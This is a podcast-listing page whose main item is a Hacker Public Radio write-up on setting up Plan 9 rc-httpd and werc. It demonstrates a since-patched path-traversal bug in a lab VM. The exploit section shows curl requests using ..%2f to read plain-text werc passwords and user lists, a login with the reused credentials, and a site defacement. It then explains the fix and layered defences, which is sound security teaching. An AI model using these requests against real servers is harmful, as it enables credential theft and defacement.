Running Firefox inside of a jail
Another way to run Firefox inside of a jail

FreeBSD distros that come with a desktop out of the box:

  GhostBSD - FreeBSD with MATE
  HelloSystem - FreeBSD with an Apple-like GUI (still in development)
  MidnightBSD - FreeBSD with Xfce and a different package management system
  NomadBSD - Live GUI FreeBSD with OpenBox
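The snapshot-rotation cron job left as a homework assignment in the snapshotting section of these notes, written here as an added example that is not part of the original show notes. It assumes a dataset such as zroot/usr/home, a root crontab entry, and the auto- name prefix chosen here; only snapshots carrying that prefix are ever destroyed, so hand-made ones like @freshinstall are left alone.

```shell
#!/bin/sh
# snaprotate.sh: recursive ZFS snapshot of a dataset plus pruning of the
# oldest automatic snapshots (added example; not from the original notes).
# Assumed root crontab entry, hourly, keeping the last 24 snapshots:
#   0 * * * * /usr/local/sbin/snaprotate.sh zroot/usr/home 24
# Only snapshots whose name contains "@auto-" are candidates for destruction,
# so snapshots taken by hand (e.g. @freshinstall) are never touched.

PREFIX="auto"

# snapshot_name: print the snapshot name for dataset $1 at UTC timestamp $2
# (YYYYMMDD-HHMMSS). The timestamp sorts lexically, which pruning relies on.
snapshot_name() {
    printf '%s@%s-%s\n' "$1" "$PREFIX" "$2"
}

# prune_list: read snapshot names (one per line) on stdin and print the ones
# to destroy, oldest first, so that at most $1 automatic snapshots remain.
# Names without the automatic prefix are filtered out and never printed.
prune_list() {
    keep=$1
    grep "@${PREFIX}-" | sort | awk -v keep="$keep" '
        { names[NR] = $0 }
        END { for (i = 1; i <= NR - keep; i++) print names[i] }'
}

# rotate: take the new snapshot of $1 and its children, then destroy the
# surplus automatic snapshots recursively, matching how they were created.
rotate() {
    dataset=$1
    keep=$2
    snap=$(snapshot_name "$dataset" "$(date -u +%Y%m%d-%H%M%S)")
    zfs snapshot -r "$snap" || exit 1
    # -d 1 lists only this dataset's own snapshots; each child's copy of a
    # snapshot goes away together with "zfs destroy -r" on the parent name.
    zfs list -H -o name -t snapshot -d 1 "$dataset" \
        | prune_list "$keep" \
        | while read -r old; do
            zfs destroy -r "$old"
        done
}

# Run only when invoked with arguments, so the functions can also be sourced.
if [ "$#" -ge 2 ]; then
    rotate "$1" "$2"
fi
```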

InfosecTrain
How to Configure Azure Front Door Service as an Application Gateway | InfosecTrain

InfosecTrain

Oct 7, 2022 13:54


Microsoft's cutting-edge cloud Content Delivery Network (CDN), Azure Front Door, offers quick, dependable, and secure access between your users and the static and dynamic online content of your apps around the world. Azure Front Door serves your content through Microsoft's global edge network, which has hundreds of local and international POPs spread across the globe close to your business and consumer end users. Learn how to configure the Azure Front Door service as an Application Gateway.

#applicationgateway #azureapplicationgateway #applicationgatewayfirewall #CDN #cloudcdn #infosectrain

✅ Our official website: https://www.infosectrain.com/
✅ For more details or a free demo with our expert, write to us at sales@infosectrain.com

Subscribe to our channel to get video updates. Hit the subscribe button above.

Facebook: https://www.facebook.com/Infosectrain/
Twitter: https://twitter.com/Infosec_Train
LinkedIn: https://www.linkedin.com/company/infosec-train/
Instagram: https://www.instagram.com/infosectrain/
Telegram: https://t.me/infosectrains

Hacker Public Radio
HPR3686: Followup for HPR3675: Clarifications on the path traversal bug

Hacker Public Radio

Sep 19, 2022


Followup for HPR3675: Installing a Plan 9 CPU server, Plan 9 web server, clarifications on the path traversal bug, private namespaces to the rescue, web application security models

Installing Plan 9 with libvirt

    [root@localhost]# virt-install -n 9pwn --description "pre-patched rc-httpd" --osinfo=unknown --memory=4096 --vcpus=4 --disk path=/var/lib/libvirt/images/9pwn.qcows,bus=virtio,size=10 --graphics spice --cdrom ~/Downloads/9front-8593.acc504c319a4b4188479cfa602e40cb6851c0528.amd64.iso --network bridge=virbr0
    [root@localhost]# virt-viewer 9pwn

How I find the IP of my guests and add it to my /etc/hosts for faster access:

    [root@localhost]# virsh domiflist 9pwn
     Interface   Type     Source   Model   MAC
    ----------------------------------------------------------
     vnet3       bridge   virbr0   e1000   52:54:00:43:8a:50
    [root@localhost]# arp -e | grep 52:54:00:43:8a:50
    192.168.122.20   ether   52:54:00:43:8a:50   C   virbr0
    [root@localhost]# echo 192.168.122.20 cirno >> /etc/hosts

Proceed as normal with a 9 installation.

Set up CPU server with rc-httpd and werc

I wrote about configuring a CPU server and also mirrored the notes at my 9front webserver containing a mirror of my plan 9 related things (using self-signed certs but it's fine). I've snarfed+pasted it here for the sake of completeness and modified it slightly so that it's more accessible for other people. I've also revised these notes so that they're less broken. I may or may not update them. I'm using 9front for this. It has more secure authentication protocols when it comes to remotely connecting.

Configuring a CPU server

Add users to file server

Connect to the file server and add a new user, placing it in the groups sys, adm, and upas:

    term% con -C /srv/cwfs.cmd
    newuser
    newuser sys +
    newuser adm +
    newuser upas +

Reboot and set user= when prompted at boot time.

Configure user's environment

This is similar to cp -r /etc/skel /home/ on a UNIX system:

    /sys/lib/newuser

Configure headless booting

Mount the boot partition:

    term% 9fs 9fat

Edit the boot config, /n/9fat/plan9.ini:

    bootfile=9pc64
    nobootprompt=local!/dev/sdC0/fscache
    mouseport=ps2
    monitor=vesa
    vgasize=1024x768x14
    user=
    tiltscreen=none
    service=cpu

Add hostowner info to nvram

Hostowner is similar to root but not quite. In our configuration, hostowner is close to being equivalent to a root user. The user= line in our boot config sets the hostowner. For automatic booting (i.e. not entering a password at the physical machine every time we power it on), we need to add the hostowner's key to nvram.

    term% nvram=/dev/sdF0/nvram auth/wrkey
    bad nvram des key
    bad authentication id
    bad authentication domain
    authid:
    authdom: cirno
    secstore key:
    password:

Configure auth server

In order to connect to the system over the network, the new user must be added to the auth server.

    term% auth/keyfs
    term% auth/changeuser
    Password:
    Confirm password:
    Assign new Inferno/POP secret? [y/n]: n
    Expiration date (YYYYMMDD or never) [never]: never
    Post id:
    User's full name:
    Department #:
    User's email address:
    Sponsor's email address:
    user installed for Plan 9

Configure permissions

/lib/ndb/auth is similar to /etc/sudoers. This configuration for the new user allows him to execute commands as other users except for the sys and adm users (sys and adm are more like groups, but who cares). Append to /lib/ndb/auth:

    hostid=
        uid=!sys uid=!adm uid=*

then reboot.

Test if it worked with drawterm

The 9front version of drawterm must be used, as it supports the better crypto in 9front. Other drawterm versions probably won't work.

    $ /opt/drawterm -u -h example.com -a example.com -r ~/

Configure rc-httpd

Edit /rc/bin/rc-httpd/select-handler. This file is something like /etc/httpd.conf on a UNIX system.

    #!/bin/rc
    PATH_INFO=$location
    switch($SERVER_NAME) {
    case example.com
        FS_ROOT=/sys/www/$SERVER_NAME
        exec static-or-index
    case *
        error 503
    }

To listen on port 80 and run the handler on port 80:

    cpu% cp /rc/bin/service/!tcp80 /rc/bin/service/tcp80
    cpu% chmod +x /rc/bin/rc-httpd/select-handler

Reboot and test.

SSL

I will never give money to the CA racket. Self-signed is the way to go on systems that don't support acme.sh, the only ACME client I use for obtaining free SSL certs. Generate and install:

    cpu% ramfs -p
    cpu% cd /tmp
    cpu% auth/rsagen -t 'service=tls role=client owner=*' > key
    cpu% chmod 600 key
    cpu% cp key /sys/lib/tls/key
    cpu% auth/rsa2x509 'C=US CN=example.com' /sys/lib/tls/key | auth/pemencode CERTIFICATE > /sys/lib/tls/cert
    cpu% mkdir /cfg/$sysname
    cpu% echo 'cat /sys/lib/tls/key >> /mnt/factotum/ctl' >> /cfg/$sysname/cpustart

Now add a listener in /rc/bin/service/tcp443:

    #!/bin/rc
    exec tlssrv -c /sys/lib/tls/cert -l /sys/log/https /rc/bin/service/tcp80 $*

And make it executable:

    cpu% chmod +x /rc/bin/service/tcp443

Install and configure werc

    cpu% cd
    cpu% mkdir /sys/www && cd /sys/www
    cpu% hget http://werc.cat-v.org/download/werc-1.5.0.tar.gz > werc-1.5.0.tgz
    cpu% tar xzf werc-1.5.0.tgz
    cpu% mv werc-1.5.0 werc
    # ONLY DO THIS IF YOU *MUST* RUN THE THINGS THAT ALLOW WERC TO WRITE TO DISK
    # EG. DIRDIR, BLAGH, ETC
    # DON'T DO THIS, JUST USE DRAWTERM OVER THE NETWORK
    # HTTP CLIENTS SHOULD NEVER BE ALLOWED TO WRITE TO DISK
    # PLEASE I BEG YOU
    cpu% cd .. && for (i in `{du www | awk '{print $2}'}) chmod 777 $i
    cpu% cd /sys/www/werc/sites/
    cpu% mkdir example.com
    cpu% mv default.cat-v.org example.com

Now re-edit /rc/bin/rc-httpd/select-handler:

    #!/bin/rc
    WERC=/sys/www/werc
    PLAN9=/
    PATH_INFO=$location
    switch($SERVER_NAME){
    case cirno
        FS_ROOT=$WERC/sites/$SERVER_NAME
        exec static-or-cgi $WERC/bin/werc.rc
    case *
        error 503
    }

Test the website. Werc is fiddly. Werc is archaic. Werc is fun.
Path traversal vulnerabilities in old versions of rc-httpd

Using release COMMUNITY VS INFRASTRUCTURE, an old release with an old rc-httpd, I have done the above steps. In current releases this bug no longer exists. Use current releases.

The vulnerability

    # get list of werc admin users
    [root@localhost]# curl http://cirno/..%2f..%2f/etc/users/admin/members
    pwn
    # get that werc user's password
    [root@localhost]# curl http://cirno/..%2f..%2f/etc/users/pwn/password
    supersecret

Wait, the passwords for werc are stored in plain text? Let's log in:

    [root@localhost]# firefox http://cirno/_users/login

Now let's see if any of the werc users are also system users:

    # let's enumerate users
    [root@localhost]# curl http://cirno/..%2f..%2f..%2f..%2f..%2f..%2f/adm/users
    -1:adm:adm:glenda,pwn
    0:none::
    1:tor:tor:
    2:glenda:glenda:
    3:pwn:pwn:
    10000:sys::glenda,pwn
    10001:map:map:
    10002:doc::
    10003:upas:upas:glenda,pwn
    10004:font::
    10005:bootes:bootes:

Let's hope that no one is re-using credentials. Let's check just to be sure:

    $ PASS=supersecret /opt/drawterm -u pwn -h cirno -a cirno -G
    cpu% cat /env/sysname
    cirno
    cpu%

This is what happens when you have path traversal vulnerabilities, an authentication vulnerability in your CMS, and shared logins/passwords.

How the static-or-cgi handler works

rc-httpd calls various handler scripts that decide what to do with requests. In the example configuration for werc, rc-httpd is instructed to call the static-or-cgi script. I will compile these archaic rc scripts into pseudo code for the listener. The static-or-cgi handler (the handler specified in the httpd config) is simple:

    #!/bin/rc
    cgiargs=$*
    fn error{
        if(~ $1 404)
            exec cgi $cgiargs
        if not
            $rc_httpd_dir/handlers/error $1
    }
    if(~ $location */)
        exec cgi $cgiargs
    if not
        exec serve-static

If the requested file exists, call the cgi handler and pass it arguments. If the requested file does not exist, call the serve-static handler.

How the serve-static handler works

The problem lies in the serve-static handler:

    #!/bin/rc
    full_path=`{echo $"FS_ROOT^$"PATH_INFO | urlencode -d}
    full_path=$"full_path
    if(~ $full_path */)
        error 503
    if(test -d $full_path){
        redirect perm $"location^'/' 'URL not quite right, and browser did not accept redirect.'
        exit
    }
    if(! test -e $full_path){
        error 404
        exit
    }
    if(! test -r $full_path){
        error 503
        exit
    }
    do_log 200
    switch($full_path){
    case *.html *.htm
        type=text/html
    case *.css
        type=text/css
    case *.txt *.md
        type=text/plain
    case *.jpg *.jpeg
        type=image/jpeg
    case *.gif
        type=image/gif
    case *.png
        type=image/png
    case *
        type=`{file -m $full_path}
    }
    if(~ $type text/*)
        type=$type^'; charset=utf-8'
    max_age=3600 # 1 hour
    echo 'HTTP/1.1 200 OK'^$cr
    emit_extra_headers
    echo 'Content-type: '^$type^$cr
    echo 'Content-length: '^`{ls -l $full_path | awk '{print $6}'}^$cr
    echo 'Cache-control: max-age='^$max_age^$cr
    echo $cr
    exec cat $full_path

In pseudo code:

  - encode the full file path into a url
  - if the url points to a file outside of '*/', the document root, error 503
  - if the url is broken, exit
  - if the url points to a file that neither exists nor is readable, error 503
  - if you haven't exited by now, serve the file

The problem is no sanitization. The script checks for files in the current directory BUT NOT BEFORE ENCODING THE URL STRING. The urlencode command, with -d, works by decoding encoded characters:

    cpu% echo 'http://cirno/..%2f' | urlencode -d
    http://cirno/../

Does ../ exist in */ ? The answer is yes. .. is a directory contained inside of */, and */../ is the current working directory.

How they fixed it

Adding a sanitizer. By comparing the encoded url against an actual hypothetical file path and exiting if there is a mismatch, all %2f funny business is avoided.

Other (optional) bad config options in werc

rc-httpd aside, a bad werc config can still lead to website defacement if your non-rc-httpd webserver has a path traversal vulnerability.
Additionally I have modified the DAC for /sys/www to allow werc, a child process of rc-httpd, to write to disk. rc-httpd runs as the none user so it's not typically allowed to write to disk unless explicitly permitted. I do not allow this on my 9 webserver because it's the worst idea in the history of all time ever. I enabled the dirdir and blagh modules as if I were the type of admin who does a chmod -R 777 /var/www/htdocs because that's what the wordpress installation guide told me to do, so I could have a cool and easy way to modify my website from the browser.

Let's pretend that I'm not the admin of this system and scrape the werc config just to see if the hypothetical badmin has these modules enabled.

    # get config
    [root@localhost]# curl http://cirno/..%2f..%2f/sites/cirno/_werc/config
    masterSite=cirno
    siteTitle='Werc Test Suite'
    conf_enable_wiki
    wiki_editor_groups admin

Hmm, looks like these modules are enabled so we can assume that httpd is allowed to write to disk. Let's modify cirno/index.md to warn the admin. As a funny joke. Totally not a crime under the Computer Fraud and Abuse Act. Totally not an inappropriate way to warn admins about a vulnerability.

    [root@localhost]# curl -s cirno | pandoc --from html --to plain
    quotes | docs | repo | golang | sam | man | acme | Glenda | 9times | harmful | 9P | cat-v.org
    Related sites: | site updates | site map |
    Werc Test Suite
    - › apps/
    - › titles/
    SECURITY ADVISORY: lol this guy still hasn't figured out the ..%2f trick
    Powered by werc

Modifying werc to support password hashing

Adding password hashes isn't too difficult. Being constrained by time, I have not done this quite yet. Reading the source code, all it takes is modifying 2 werc scripts: bin/werclib.rc and bin/aux/addwuser.rc.

    % echo 'supersecret' | sha1sum -2 512

Private namespaces to the rescue

Luckily enough, the webserver runs as the none user with its own namespace.
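A bare SHA-512 of the password, as in the sha1sum -2 512 line above, is unsalted and fast to brute-force, so two users with the same password get the same line and a leaked file cracks quickly. The following is an added example, not werc's code, of what the per-user password line could hold instead and how the login check would verify it: a random per-user salt, a slow key derivation, and a constant-time compare. The storage format, the parameters, the function names and the upgrade helper are my own choices; PBKDF2-HMAC-SHA512 is used only because it is in every Python standard library, and scrypt or argon2 would be preferable where available.

```python
"""Added example, not werc's code: a salted, slow password hash for the
per-user password file, with verification and a clear-text upgrade path."""
import base64
import binascii
import hashlib
import hmac
import secrets
from typing import Optional

# PBKDF2-HMAC-SHA512 from the standard library; swap in scrypt/argon2 if
# available, keeping the same "scheme$params$salt$hash" line shape.
_SCHEME = "pbkdf2-sha512"
_ITERATIONS = 200_000
_DKLEN = 32


def hash_password(password: str, salt: Optional[bytes] = None) -> str:
    """Return 'pbkdf2-sha512$<iterations>$<salt>$<hash>' (salt and hash base64)."""
    if salt is None:
        salt = secrets.token_bytes(16)          # fresh per-user salt
    digest = hashlib.pbkdf2_hmac("sha512", password.encode("utf-8"),
                                 salt, _ITERATIONS, dklen=_DKLEN)
    return "%s$%d$%s$%s" % (
        _SCHEME, _ITERATIONS,
        base64.b64encode(salt).decode("ascii"),
        base64.b64encode(digest).decode("ascii"))


def verify_password(password: str, stored: str) -> bool:
    """Check a login attempt against one stored line.

    Anything that does not parse, including an old clear-text line, fails
    closed.  The comparison is constant-time so the hash cannot be probed
    byte by byte through timing.
    """
    try:
        scheme, iterations, salt_b64, digest_b64 = stored.strip().split("$")
        if scheme != _SCHEME:
            return False
        salt = base64.b64decode(salt_b64, validate=True)
        expected = base64.b64decode(digest_b64, validate=True)
        rounds = int(iterations)
    except (ValueError, binascii.Error):
        return False
    got = hashlib.pbkdf2_hmac("sha512", password.encode("utf-8"),
                              salt, rounds, dklen=len(expected))
    return hmac.compare_digest(got, expected)


def upgrade_cleartext(old_line: str) -> str:
    """Rewrite one old clear-text password-file line in the new format."""
    return hash_password(old_line.rstrip("\n"))


if __name__ == "__main__":
    # Constructed input: the clear-text line the post pulled out with curl.
    line = upgrade_cleartext("supersecret\n")
    print(line)
    print(verify_password("supersecret", line), verify_password("wrong", line))
```

Because verify_password refuses anything that is not in the new format, an unconverted clear-text file stops working the moment the login path switches over, which is the safer failure: it forces the upgrade rather than silently accepting the old file.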
Comparing the hostowner's namespace and none user's namespace I grab the namespace from the system console (ie not from drawterm) and from the listen command, then run a diff (unix style) to show the differences. cpu% ns | sort > cpu.ns cpu% ps -a | grep -e 'listen.*80' | grep -v grep none 355 0:00 0:00 132K Open listen [/net/tcp/2 tcp!*!80] cpu% ns 355 | sort > listen.ns cpu% diff -u listen.ns cpu.ns --- listen.ns +++ cpu.ns @@ -6,17 +6,29 @@ bind /amd64/bin /bin bind /mnt /mnt bind /mnt/exportfs /mnt/exportfs +bind /mnt/temp/factotum /mnt/factotum bind /n /n bind /net /net bind /root /root +bind -a '#$' /dev bind -a '#I' /net +bind -a '#P' /dev +bind -a '#S' /dev bind -a '#l' /net +bind -a '#r' /dev +bind -a '#t' /dev +bind -a '#u' /dev +bind -a '#u' /dev bind -a '#¤' /dev bind -a '#¶' /dev +bind -a '#σ/usb' /dev +bind -a '#σ/usbnet' /net bind -a /rc/bin /bin bind -a /root / +bind -b '#k' /dev bind -c '#e' /env bind -c '#s' /srv +bind -c /usr/pwn/tmp /tmp cd /usr/pwn mount -C '#s/boot' /n/other other mount -a '#s/boot' / 
@@ -26,4 +38,4 @@ mount -a '#s/slashmnt' /mnt mount -a '#s/slashn' /n mount -aC '#s/boot' /root -mount -b '#s/factotum' /mnt +mount -b '#s/cons' /dev

The major difference is that the hostowner (equivalent to the root user) has a lot more things bound into his namespace:

    '#$'  PCI interfaces
    '#P'  APM power management
    '#S'  storage devices
    '#r'  realtime clock and nvram
    '#t'  serial ports
    '#u'  USB
    '#σ'  /shr global mountpoints
    '#k'  keyboard
    /tmp  directories
    '#s'  various special files relating to services

The listen process in question is fairly well isolated from the system. Minimal system damage can be caused by pwning a process owned by none.

Closing

An argument could be made that the rc-httpd vulnerability was "not a bug" because "namespaces are supposed to segregate the system". I disagree on this point. Namespaces are good and all, but security is a multi-layer thing. Relying on a single security feature to save your system means relying on a single point of failure. Chroot escapes, namespace escapes, container escapes, and VM escapes are all things we need to be thinking about when writing software that touches the internet. Although unlikely, getting pwned in spite of these security methods is still possible; all user input is dangerous, and all user input that becomes remote code execution always results in privilege escalation no matter how secure you think your operating system is. Each additional layer of security makes it harder for attackers to get into the system. For example, when I write PHP applications, I consider things in this order:

- don't pass unnecessary resources into the document root via symlinks, bind mounts, etc.
- never ever use system() in a context where user input can ever be passed to the function, in order to avoid shell escapes
- sanitize all user input depending on context. Ex: if the PHP program is directly referencing files, make a whitelist and compare requests to this whitelist. If the PHP process is writing to a database, use prepared statements.
- fire up a kali linux vm and beat the test server half to death
- iterate upon my ignorance
- doubly verify DAC just to be sure
- re-check daemon configs to make sure I'm not doing anything stupid
- FINALLY: rely on SELinux or OpenBSD chroots (depending on prod env) to save me if all else failed

And of course the other things like firewalls (with whitelists for ports and blacklists for entire IP address blocks), key-based ssh authentication, sshd configurations that don't make it possible to enumerate users, rate limiters, etc.

Each layer of security is like a filter. If you have enough layers of filters it would take an unrealistic amount of force to push water through. Although no system is perfectly safe from three-letter agencies, a system with multiple layers of security is typically safe from drive-by attacks.

Final exercise: intentionally write a php script that does path traversal. Run this on a system with SELinux. Try to coax /etc/passwd out of the server. Now try php-fpm instead of mod_php or vice-versa. You'll be surprised when even MAC doesn't protect your system.

Even now, after spending almost a month and a half's worth of after-work hacker hours almost exclusively on 9, I enjoy it more than when I began and even more than when using it in semi-regular spurts in years past. The purpose of research operating systems is to perform research, be it about the design of the system or otherwise. Where would we be without private namespaces? How can I use this idea in the real world? What would the world look like if we had real distributed computing instead of web browsers (which are the new dumb terminal)? Is there a use case for this in the real world? What can we learn from single-layer security models? What can we do to improve the system? Plan 9 is perfect for this type of research.
I'm considering writing an httpd in C and a werc-like (minus the parts I don't like) in C, and modifying the namespace for the listener so that I can run a webserver on 9 without pulling in /bin, in order to reduce the possibility of a shell escape.

I think that in order to improve ourselves, we must be critical of ourselves. We must be critical of the things we enjoy in order to improve them and learn something new in the process. For software especially, there is no such thing as perfection, only least bad.

And my final thought:

Criticism: This program/OS/whatever sucks
Response: I know, help me fix it.

Astro arXiv | all categories
Optimisation of the WEAVE target assignment algorithm

Astro arXiv | all categories

Play Episode Listen Later Sep 5, 2022 0:29


Optimisation of the WEAVE target assignment algorithm by Sarah Hughes et al. on Monday 05 September WEAVE is the new wide-field spectroscopic facility for the prime focus of the William Herschel Telescope in La Palma, Spain. Its fibre positioner is essential for the accurate placement of the spectrograph's ~960-fibre multiplex. To maximise the assignment of its optical fibres, WEAVE uses a simulated annealing algorithm called Configure, which allocates the fibres to targets in the field of view. We have conducted an analysis of the algorithm's behaviour using a subset of mid-tier WEAVE-LOFAR fields, and adjusted the priority assignment algorithm to optimise the total fibres assigned per field, and the assignment of fibres to the higher priority science targets. The output distributions have been examined, to investigate the implications for the WEAVE science teams. arXiv: http://arxiv.org/abs/2209.01145v1

Ctrl+Alt+Azure
149 - Developing in the cloud with Microsoft Dev Box

Ctrl+Alt+Azure

Play Episode Listen Later Aug 31, 2022 35:44


(00:00) - Intro and catching up.
(03:09) - Show content starts.
Show links
- Configure the Dev Box service (Microsoft Docs)
- Dev Box pricing (Microsoft Azure)
- Markus Lintuala's tweet on the passwordless update (Twitter)
SPONSOR
This episode is sponsored by Sovelto. We at Sovelto support your personal growth, keep your Azure skills up to date and increase your market value. Learn or expire: sovelto.fi/pro

Stefanos Cloud Podcast (stefanos.cloud)
How to configure Microsoft 365 settings in the admin center portal

Stefanos Cloud Podcast (stefanos.cloud)

Play Episode Listen Later Aug 22, 2022 23:16


In this how-to article, we will show you how to configure Microsoft 365 settings in the admin center portal. These settings include domains, search and intelligence, org settings, integrated apps and partner relationships. --- Send in a voice message: https://anchor.fm/stefanoscloud/message

RetroRGB Weekly Roundup
Supporter Q&A #219

RetroRGB Weekly Roundup

Play Episode Listen Later Aug 5, 2022 53:34


Here's the Supporter Q&A from August 4th, 2022. All comments and questions are fielded through the support service Q&A page. Please consider supporting this channel via monthly services, tips, or even just by using our affiliate links to purchase things you were already going to buy anyway, at no extra cost to you: https://www.retrorgb.com/support.html View this as a video: https://www.youtube.com/retrorgb Amazon Links to products I use: https://www.amazon.com/shop/retrorgb T-Shirts & Stuff: https://www.retrorgb.com/store.html TIMESTAMPS (please assume all links are affiliate links): 00:00 Welcome! 00:17 Getting audio from TV's via ARC 05:46 Raspberry Pi hat in 480i for TV & Movies? https://www.recalbox.com/ 07:36 Mixing switches in a retro matrix setup 15:04 HDMI matrix with VRR & 4K 120? 19:14 Splitting MiSTer RGB Output for arcade cabs: https://twitter.com/dojooculto/status/1553413151596503041 22:29 My thoughts on repro's 26:04 Why no dedicated RF to composite boxes? 28:55 3DO Suggestions: ODE: https://www.retrorgb.com/external-3do-odes-available-for-pre-order.html RGB Kit: https://www.retrorgb.com/3do-rgb-in-stock-at-retrogamerstuff-com.html 32:16 PS3 - SSD or HDD? 34:09 Latency testing discrepancy 37:34 Cloud sync gamesaves 40:37 Configure a GC to sell 43:50 Video card for VGA monitors / a BFI box? 47:13 Missing question? 47:34 WTF happened to my ceiling??? --- Support this podcast: https://anchor.fm/retrorgb/support

SugarU Podcast
Season 2 Episode 15: Sugar Customer Self-Service Portal

SugarU Podcast

Play Episode Listen Later Aug 2, 2022 8:23


Show Notes: In this episode, we discuss how the self-service customer portal is just a part of the solution for your customer experience. We talk about what self-service means to your customer and you and how it can be configured to best meet your ideal customer experience. Sugar Serve Demo (with self-service portal) Quick Video: How to Configure the Self-Service Customer Portal

Mully & Haugh Show on 670 The Score
Brad Biggs on how Bears will configure offensive line

Mully & Haugh Show on 670 The Score

Play Episode Listen Later Jul 28, 2022 16:01


Mike Mulligan and David Haugh were joined by Brad Biggs of the Tribune to discuss the latest Bears storylines as they held their first practice of training camp. How will the Bears configure their offensive line after the additions of Michael Schofield and Riley Reiff?

XenTegra - Nutanix Weekly
Nutanix Weekly: Convert Your Cluster to AHV and Configure Leap for Disaster Recovery

XenTegra - Nutanix Weekly

Play Episode Listen Later Jul 13, 2022 34:19 Transcription Available


On my previous blog (Link) I showed you how to build a metro availability. Now I want to "upgrade" both clusters to AHV and enable data protection with the help of Leap to achieve an RPO of zero (0). This blog post is two posts combined. First is the in-place conversion of ESX to AHV and the second is how to enable and configure Leap.
Host: Harvey Green
Co-host: Jirah Cox
Co-host: Ben Rogers

The Swyx Mixtape
Time Management: Capture, Configure, Control [Cal Newport]

The Swyx Mixtape

Play Episode Listen Later Jul 12, 2022 23:11


Listen to Deep Questions: https://www.listennotes.com/podcasts/deep-questions/ep-169-how-do-i-manage-my-time-gTNFVbZvLQA/
Three requirements of time management
Capture: don't store anything in your head. Your ideas, info, commitments, plans.
Configure: make effort organizing. Gather relevant info in one place.
Control: proactively make a plan for your time in advance: quarterly, weekly, daily
Constrain (bonus!): figure out how to automate, consolidate interruptions with office hours
Actual tools used
Capture: workingmemory.txt; shutdown: -> go thru workingmemory -> trello, gdoc
Configure: separate kanban board for every role - researcher, etc; columns "to be processed", "waiting to hear back from", "persistent initiatives"; daily: just add stuff; weekly: reorganize and review
Control: daily, weekly, quarterly, time blocking

BSD Now
462: OpenBSD Sales Pitch

BSD Now

Play Episode Listen Later Jul 7, 2022 53:49 Very Popular


The Design and Implementation of the NetBSD rc.d system, selling OpenBSD as a salesperson, Speeding up autoconf with caching, Allowing non-root execution of a jailed application, Configure login(1) and sshd(8) for YubiKey on OpenBSD, and more.
NOTES
This episode of BSDNow is brought to you by Tarsnap (https://www.tarsnap.com/bsdnow) and the BSDNow Patreon (https://www.patreon.com/bsdnow)
Headlines
The Design and Implementation of the NetBSD rc.d system (http://www.mewburn.net/luke/papers/rc.d.pdf)
How I would sell OpenBSD as a salesperson (https://dataswamp.org/~solene/2022-06-22-openbsd-selling-arguments.html)
News Roundup
Speeding up autoconf with caching (https://jmmv.dev/2022/06/autoconf-caching.html)
Allowing non-root execution of a jailed application (https://forums.freebsd.org/threads/allowing-non-root-execution-of-a-jailed-application.85532/)
Configure login(1) and sshd(8) for YubiKey on OpenBSD (https://romanzolotarev.com/openbsd/yubikey.html)
Tarsnap
This week's episode of BSDNow was sponsored by our friends at Tarsnap, the only secure online backup you can trust your data to. Even paranoids need backups.
Feedback/Questions
Glen - Thanks Todd (https://github.com/BSDNow/bsdnow.tv/blob/master/episodes/462/feedback/Glen%20-%20Thanks%20Todd.md)
Karl - Memory Question (https://github.com/BSDNow/bsdnow.tv/blob/master/episodes/462/feedback/Karl%20-%20Memory%20Question.md)
alejandro - Tom's laptop (https://github.com/BSDNow/bsdnow.tv/blob/master/episodes/462/feedback/alejandro%20-%20Tom's%20laptop.md)
Send questions, comments, show ideas/topics, or stories you want mentioned on the show to feedback@bsdnow.tv (mailto:feedback@bsdnow.tv)

XenTegra - IGEL Weekly
IGEL Weekly: How to Configure Zoom Virtual Backgrounds on IGEL OS

XenTegra - IGEL Weekly

Play Episode Listen Later Jun 22, 2022 37:48 Transcription Available


Recently, in the IGEL Community, Lars Glöckner, Senior Solutions Architect EMEA at IGEL, posted a tech-tip on configuring Zoom virtual backgrounds on IGEL OS. Make Zoom Virtual Background on Linux available with Citrix, VMware Horizon, and AVD (WVD) when you don't have the supported hardware in place.
Host: Andy Whiteside
Co-host: Patrick Toner
Co-host: Chris Feeney

Mully & Haugh Show on 670 The Score
Ozzie Guillen shares how White Sox should configure bullpen with Liam Hendriks out (Hour 3)

Mully & Haugh Show on 670 The Score

Play Episode Listen Later Jun 15, 2022 36:25


In the third hour, David Haugh was joined by NBC Sports Chicago analyst Ozzie Guillen to discuss the latest White Sox storylines, including closer Liam Hendriks landing on the injured list. Who should get the ball in the ninth inning now? Later, BetQL Daily host Joe Ostrowski joined the show to discuss the latest sports gambling storylines.

CLARITY.SHOW Quote-to-Cash Podcast
Recent Innovations in Configure, Price, Quote | CLARITY.SHOW - Quote-to-Cash Podcast Nr3

CLARITY.SHOW Quote-to-Cash Podcast

Play Episode Listen Later Jun 8, 2022 31:09


Next-generation of Configure, Price, Quote systems - how trends that we see on the market today are affecting CPQ systems development and increasing CPQ value for business and customers. Our guest: Chris Weckler, Solutions Director at SAP. ► Subscribe to CLARITY Quote-to-Cash Podcast Channel here: https://www.youtube.com/channel/UCjnDGDhYKhedl2lVIv6QRkQ Follow Us Here: Website: https://www.clarity.cx/clarity-show LinkedIn: https://www.linkedin.com/company/claritygroup

Google Cloud Platform Podcast
GKE Release Channels with Kobi Magnezi and Abdelfettah Sghiouar

Google Cloud Platform Podcast

Play Episode Listen Later May 25, 2022 47:56


Kaslin Fields and Mark Mirchandani learn how GKE manages their releases and how customers can take advantage of the GKE release channels for smooth transitions. Guests Abdelfettah Sghiouar and Kobi Magnezi of the Google Cloud GKE team are here to explain. With releases every four months or so, Kobi tells us that Kubernetes requires two pieces to be managed with each release: the control plane and the nodes. Both are managed for the customer in GKE. The new addition of release channels allows flexibility with release updating so customers can adjust to their specific project needs. Each channel offers a different updating mix and speed, and clients choose the channel that's right for their project. The idea for release channels isn't a new one, Kobi explains. In fact, Google's frequent project releases, while keeping things secure and running well, also can be customized by choosing from an assortment of channels in other Google offerings like Chrome. Our guests talk us through the process of releasing through channels and how each release marinates in the Rapid channel to be sure the version is supported and secure before being pushed to customers through other channels. We hear how release channels differ from no-channel releases, the benefits of specialized channels, and recommendations for customers as far as which channels to use with different development environments. Abdel describes real-world use cases for the Rapid, Regular, and Stable channels, the Surge Upgrade feature, and how GKE notifications with Pub/Sub helps in the updating process. Kobi talks about maintenance and exclusion windows to help customers further customize when and how their projects will update. Kobi and Abdel wrap up with a discussion of the future of GKE release channels. Kobi Magnezi Kobi is the Product Manager for GKE at Google Cloud. Abdelfettah Sghiouar Abdel is a Cloud Dev Advocate with a focus on Cloud native, GKE, and Service Mesh technologies. 
Cool things of the week
GKE Essentials videos
KubeCon EU 2023 site
KubeCon Call for Proposals site
Kubernetes 1.24: Stargazer site
